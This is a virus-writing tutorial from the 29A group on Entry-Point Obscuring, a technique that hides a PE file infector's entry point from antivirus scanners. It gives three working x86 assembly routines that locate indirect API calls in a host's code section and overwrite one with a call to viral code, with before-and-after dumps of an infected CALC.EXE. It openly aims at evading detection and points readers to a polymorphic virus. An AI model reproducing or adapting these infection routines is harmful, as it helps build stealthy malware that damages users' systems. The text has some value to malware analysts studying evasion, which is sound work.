;---------------------------------------------------------------------------- ;EPO: Entry-Point Obscuring ; ;by GriYo / 29A ;---------------------------------------------------------------------------- In order to recive control a virus can modify an executable in several ways: - Modifying the entry-point field making it point to the virus code - Inserting a jump to the virus over the programs code The first way is easy, but almost every decent antivirus nowadays will mark infected files as suspicious. The reason? A file whose entry-point is outside code section is, at last, suspicious. The second way is a bit more complex. The virus can overwrite the first instruction (the one pointed by the entry-point field in file header) with a jump or call to itself. Cabanas virus uses this method. Using the second way the virus will fool some antivirus, but some others still report the suspicious flag while scanning. The reason? The antivirus looks at the code on the file entry-point and detects a jump or call outside code section. We can generate some random instructions before the jump or call to virus code. If the antivirus just look at first instruction it will fail on detecting the jump to virus. Marburg and Parvo viruses uses this method, but now this is not enough. Some antivirus can trace through this garbage code and can find the jump outside the code section, reporting the suspicious flag again. Solution? We have to inject a jump or call to our virus inside host code, but far away of the file entry-point. To do this we can emulate each instruction until we find a save place. But wait! There is no real need for writing a debugger-like virus. We can take advantage of the PE structure in order to fast-scan the file looking for a place to insert a jump or call to virus code. How? Lets look at this dump of CALC.EXE code section: 01 .text SH_PointerToRawData 00001000 SH_VirtualAddress 00001000 SH_SizeOfRawData 0000C000 SH_VirtualSize 0000BF22 characteristics 60000020 CODE MEM_EXECUTE MEM_READ The entry-point is at 00005D30h, and the code there looks like this: 01285D30 64A100000000 mov eax,fs:[00000000] 01285D36 55 push ebp 01285D37 8BEC mov ebp,esp 01285D39 6AFF push FFFFFFFF 01285D3B 6808DF2801 push 0128DF08 01285D40 68D4742801 push 012874D4 01285D45 50 push eax 01285D46 64892500000000 mov fs:[00000000],esp 01285D4D 83EC60 sub esp,00000060 01285D50 53 push ebx 01285D51 56 push esi 01285D52 57 push edi 01285D53 8965E8 mov [ebp-18],esp 01285D56 FF1568D02801 call [0128D068] 01285D5C A38CF52801 mov [0128F58C],eax 01285D61 33C0 xor eax,eax Skip first instructions and go to the one at 01285D56. This instruction takes the address at 0128D068 and executes the routine there. At the mentioned address is the value 77F13FD5, which is the entry point of GetVersion api. So this instruction calls GetVersion. Now look at the opcodes of this instruction: FF1568D02801 15FF CALL indirect 0128D068 Pointer to the routine entry point Well, nothing new by now, but lets walk the reverse way, now we want to find a call to an api inside the program code. So take the entry point raw (00005D30) and look there: 00005D30 64 A1 00 00 00 00 55 8B dí Uï 00005D38 EC 6A FF 68 08 DF 28 01 8j h.¯(. 00005D40 68 D4 74 28 01 50 64 89 h+t(.Pdë 00005D48 25 00 00 00 00 83 EC 60 % â8` 00005D50 53 56 57 89 65 E8 FF 15 SVWëeF . 00005D58 68 D0 28 01 A3 8C F5 28 h-(.úî)( 00005D60 01 33 C0 A0 8D F5 28 01 .3+áì)(. 00005D68 A3 98 F5 28 01 A1 8C F5 úÿ)(.íî) 00005D70 28 01 C1 2D 8C F5 28 01 (.--î)(. 00005D78 10 25 FF 00 00 00 A3 94 .%  úö 00005D80 F5 28 01 C1 E0 08 03 05 )(.-a... If we scan this area looking for the CALL opcodes (FF15) we will find them at 00005D56. After this opcodes comes a pointer to the routine entry point, lets examine it: 00005D58 68 D0 28 01 -> 0128D068 Lets see whats at 0128D068 in our memory image of the file: 0128D068 -> Pointer to routine entry point 01280000 -> Image base address in file header -------- 0000D068 -> Rva of routine entry point Look now at this dump of CALC.EXE imports section: 02 .rdata SH_PointerToRawData 0000D000 SH_VirtualAddress 0000D000 SH_SizeOfRawData 00002000 SH_VirtualSize 00001F0A characteristics 60000020 INITIALIZED_DATA MEM_READ Well! it seems that we have found the form of locating calls to APIs inside the code of the host. But the bytes FF15h dont have to belong to an API call. It could be, for example, of a MOV EAX,0000FF15h. How can be sure? We will exploit the PE structure in order to extract the name from the API to which makes reference the CALL instruction. Look at the raw address corresponding to 0000D068 rva ( in this example rva is equal to raw). 0000D068 24 E8 00 00 Ought! This isnt the entry point of GetVersion (77F13FD5) but wait! Look at offset 0000E824 in the file: 0000E824 4C 01 47 65 74 56 65 72 L.GetVer 0000E82C 73 69 6F 6E 00 00 6B 00 sion..k. This is how programs import an api by name. The first word is the api 'hint' and its followed by the api name. In summary: Code section Imports section ------------------------------- ------------------------------- 01285D56 - call [0128D068] ^ '--------->D068 - 24 E8 00 00 ^ ,----------' | '->E824 - 4C 01 E826 - "GetVersion" Let us put hands to the work. The following code is a first approach to the exposed: ;---------------------------------------------------------------------------- ;Example 1 ; ;On entry: ; ebx -> Host base address ; ecx -> Pointer to RAW data or NULL if error ; edx -> Entry-point RVA ; esi -> Pointer to IMAGE_OPTIONAL_HEADER ; edi -> Pointer to section header ; ebp -> Virus delta offset ; ;On exit: ; ebx -> Not changed ; ecx -> Pointer to instruction after the api ; call or NULL if error ; ;---------------------------------------------------------------------------- example_1: mov edx,dword ptr [esi+OH_ImageBase] mov esi,ecx mov ecx,dword ptr [edi+SH_VirtualSize] sub ecx,eax dec ecx search_call: lodsw dec esi cmp ax,15FFh je found_call loop search_call ret ;Opcode not found found_call: inc esi lodsd sub eax,edx mov edx,eax push esi call RVA2RAW pop esi jecxz e_get_code_raw xchg ecx,esi lodsd lea esi,dword ptr [ebx+eax] lodsw mov edx,ecx mov ecx,00000020h mov edi,esi xor eax,eax IsThisStr: scasb jz OhYesItIs loop IsThisStr ret ;Null terminator not found OhYesItIs: push edx ;Ptr to next instruction push esi push dword ptr [ebp+hKERNEL32] call dword ptr [ebp+a_GetProcAddress] pop ecx sub ecx,ebx or eax,eax jnz e_get_code_raw mov ecx,eax e_get_code_raw: ret ;End of example 1 ;---------------------------------------------------------------------------- Once the virus obtains a valid pointer it can copy the instruction there into a save buffer and patch it with a jump or call to viral code. Using this example the code at CALC.EXE entry point now looks like this: 01285D30 64A100000000 mov eax,fs:[00000000] 01285D36 55 push ebp 01285D37 8BEC mov ebp,esp 01285D39 6AFF push FFFFFFFF 01285D3B 6808DF2801 push 0128DF08 01285D40 68D4742801 push 012874D4 01285D45 50 push eax 01285D46 64892500000000 mov fs:[00000000],esp 01285D4D 83EC60 sub esp,00000060 01285D50 53 push ebx 01285D51 56 push esi 01285D52 57 push edi 01285D53 8965E8 mov [ebp-18],esp 01285D56 FF1568D02801 call [0128D068] 01285D5C E898800000 call 0128DDF9 01285D61 33C0 xor eax,eax As you can see the instruction: 01285D5C A38CF52801 mov [0128F58C],eax Has been overwritten by this one: 01285D5C E898800000 call 0128DDF9 This will push into stack the address of the next instruction. The virus can pop this address in order to restore the original code there (saved while infecting the file) and transfer control back to the host when its work is done. If you test by yourself you will find that the above code isnt very smart. Lets think on how the code at example 1 works and see what happens when handling the following code: jecxz label push ecx call CloseHandle push eax label: ... And this is how the above code looks once patched: jecxz label push ecx call CloseHandle call go2virus The problem here is the jecxz instruction that may transfer control somewhere in the middle of the call to virus. So if ecx is 00000000h our virus wont execute, and the jecxz will jump to an invalid position. The previous example is incorrect on purpose, it is good to show one of the most common pitfalls when we patch an executable. Lets modify the code on example 1 to handle this situation. ;---------------------------------------------------------------------------- ;Example 2 ; ;On entry: ; ebx -> Host base address ; ecx -> Pointer to RAW data or NULL if error ; edx -> Entry-point RVA ; esi -> Pointer to IMAGE_OPTIONAL_HEADER ; edi -> Pointer to section header ; ebp -> Virus delta offset ; ;On exit: ; ebx -> Not changed ; ecx -> Inject point offset in file or NULL if error ; ;---------------------------------------------------------------------------- example_2: mov edx,dword ptr [esi+OH_ImageBase] mov esi,ecx mov ecx,dword ptr [edi+SH_VirtualSize] search_call: push ecx lodsw dec esi cmp ax,15FFh jne NoCallOpcode push esi inc esi lodsd sub eax,edx mov edx,eax push esi call RVA2RAW pop esi jecxz NextApe xchg ecx,esi lodsd sub eax,edx lea esi,dword ptr [eax+ebx] lodsw mov edx,ecx mov ecx,00000020h mov edi,esi xor eax,eax IsThisStr: scasb jz FoundNull loop IsThisStr NextApe: pop esi NoCallOpcode: pop ecx loop search_call ExitApe: ret ;Opcode not found FoundNull: push edx push esi push dword ptr [ebp+hKERNEL32] call dword ptr [ebp+a_GetProcAddress] pop ecx sub ecx,ebx sub ecx,00000006h or eax,eax jz NextApe pop eax pop eax ret ;End of example 2 ;---------------------------------------------------------------------------- Now we overwrite the api call with our call to virus body, instead of writing it next. Using this way we will never overwrite any instruction except the api call. Lets return to our example using CALC.EXE as goat. This was CALC.EXE original code before infection: 01285D30 64A100000000 mov eax,fs:[00000000] 01285D36 55 push ebp 01285D37 8BEC mov ebp,esp 01285D39 6AFF push FFFFFFFF 01285D3B 6808DF2801 push 0128DF08 01285D40 68D4742801 push 012874D4 01285D45 50 push eax 01285D46 64892500000000 mov fs:[00000000],esp 01285D4D 83EC60 sub esp,00000060 01285D50 53 push ebx 01285D51 56 push esi 01285D52 57 push edi 01285D53 8965E8 mov [ebp-18],esp 01285D56 FF1568D02801 call [0128D068] 01285D5C A38CF52801 mov [0128F58C],eax 01285D61 33C0 xor eax,eax And this is once infected using code on example 2: 01285D30 64A100000000 mov eax,fs:[00000000] 01285D36 55 push ebp 01285D37 8BEC mov ebp,esp 01285D39 6AFF push FFFFFFFF 01285D3B 6808DF2801 push 0128DF08 01285D40 68D4742801 push 012874D4 01285D45 50 push eax 01285D46 64892500000000 mov fs:[00000000],esp 01285D4D 83EC60 sub esp,00000060 01285D50 53 push ebx 01285D51 56 push esi 01285D52 57 push edi 01285D53 8965E8 mov [ebp-18],esp 01285D56 E898800000 call 0128DDF3 01285D5B 01 db 01h 01285D5C A38CF52801 mov [0128F58C],eax 01285D61 33C0 xor eax,eax Note that our injected call instruction uses less bytes than the api call. As result everything stays on its place, except for the call, that now will transfer control to our virus. Also note that we are working with the first api call found from the entry point to the end of code section. But we can skip some apis until a point somewhere deep-inside code section. Let modify example 2 to do this: ;---------------------------------------------------------------------------- ;Example 3 ; ;On entry: ; ebx -> Host base address ; ecx -> Pointer to RAW data or NULL if error ; edx -> Entry-point RVA ; esi -> Pointer to IMAGE_OPTIONAL_HEADER ; edi -> Pointer to section header ; ebp -> Virus delta offset ; ;On exit: ; ebx -> Not changed ; ecx -> Inject point offset in file or NULL if error ; ;---------------------------------------------------------------------------- example_3: mov eax,dword ptr [edi+SH_VirtualSize] shr eax,01h call get_rnd_range mov edx,dword ptr [esi+OH_ImageBase] lea esi,dword ptr [eax+ecx] mov ecx,dword ptr [edi+SH_VirtualSize] sub ecx,eax search_call: push ecx lodsw dec esi cmp ax,15FFh jne NoCallOpcode push esi inc esi lodsd sub eax,edx mov edx,eax push esi call RVA2RAW pop esi jecxz NextApe xchg ecx,esi lodsd sub eax,edx lea esi,dword ptr [eax+ebx] lodsw mov edx,ecx mov ecx,00000020h mov edi,esi xor eax,eax IsThisStr: scasb jz FoundNull loop IsThisStr NextApe: pop esi NoCallOpcode: pop ecx loop search_call ExitApe: ret ;Opcode not found FoundNull: push edx push esi push dword ptr [ebp+hKERNEL32] call dword ptr [ebp+a_GetProcAddress] pop ecx sub ecx,ebx sub ecx,00000006h or eax,eax jz NextApe pop eax pop eax ret ;End of example 3 ;---------------------------------------------------------------------------- The above code gets a random number from 00000000h to the end of code section size, and start searching there for any api call. Yes, the random number generator and the RVA2RAW routines arent included, write your own ones. While playing with the above stuff i found the following problems: - Lots of files never got infection - The search procedure usually exits due to exceptions Files generated with Borland linker does not use the calling structure we saw before. So we have to handle them in a different way. Binded files also need some special care. Another *not-so-much-smart* part is to use GetProcAddress to check the API name. Would be better to check whenever a RVA points inside Import Section. I admit it, the above examples are pure shit, but enough to easily explain the idea behind. Using this method the virus entry-point will be definetively hidden and a virus using this plus a polymorphic engine may be really hard to spot. If the polymorphic engine succesfully produces a complete random pattern and the entry point to this pattern of code is unknown the virus will be safe of lame AV detection technics for long time. I wrote the whole routine again keeping in mind all this problems. You can find the result in the source code of the CTX-Phage virus. It shows how to implement the "EPO" tech in conjuntion with strong polymorphic encryption. Another possibility is to locate structures generated by high level languages compilers. For instance: 01012420 55 push ebp 01012421 8BEC mov ebp,esp I leave this part to you, have fun. -- GriYo / 29A I'm not in the business... ...I am the business